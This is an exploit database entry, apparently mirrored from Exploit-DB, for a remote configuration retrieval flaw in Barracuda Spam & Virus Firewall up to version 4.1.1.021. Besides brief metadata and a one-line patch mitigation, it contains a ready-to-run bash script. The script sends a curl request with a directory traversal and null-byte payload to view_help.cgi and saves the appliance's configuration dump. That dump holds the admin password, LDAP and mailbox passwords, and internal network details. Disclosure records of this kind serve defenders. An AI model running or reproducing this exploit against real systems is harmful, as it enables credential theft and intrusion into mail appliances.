Barracuda Networks Spam & Virus Firewall

vendor:

Spam & Virus Firewall

by:

ShadowHatesYou

8,8

CVSS

HIGH

Remote Configuration Retrieval

N/A

CWE

Product Name: Spam & Virus Firewall

Affected Version From: 4.1.1.021

Affected Version To: 4.1.1.021

Patch Exists: YES

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Linux

2020

Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval

This exploit allows an attacker to retrieve the configuration of a Barracuda Networks Spam & Virus Firewall <= 4.1.1.021. The configuration includes the administrative password for the BSF, MTA LDAP passwords, password for each configured mailbox, and internal networking information.

Mitigation:

Ensure that the Barracuda Networks Spam & Virus Firewall is up to date with the latest security patches.

Source

Exploit-DB raw data:

#!/bin/bash
# Exploit by ShadowHatesYou
# Shadow@SquatThis.net
#
# The resulting output is an SQL dump containing the Barracuda's configuration, which includes goodies such as:
#
# The administrative password for the BSF(system_password)
# MTA LDAP passwords(mta_ldap_advanced_password)
# Password for each configured mailbox(user_password)
# Internal networking information(system_gateway, system_ip, system_netmask, system_primary_dns_server, system_secondary_dns_server)
#
#
# Exploit-DB Notes:
# If /cgi-mod/view_help.cgi returns a 404, try /cgi-bin/view_help.cgi instead. You should be able to determine this manually since Barracuda automatically redirects you to the login page anyway.

if [ $# != 1 ]; then
	echo "# Barracuda Networks Spam & Virus Firewall <= 4.1.1.021 Remote Configuration Retrieval"
	echo "# Use: $0 <host/ip> "
	echo "#"
	exit;
fi;
curl http://$1:8000/cgi-mod/view_help.cgi?locale=/../../../../../../../mail/snapshot/config.snapshot%00 > $1.config
ls -hl $1.config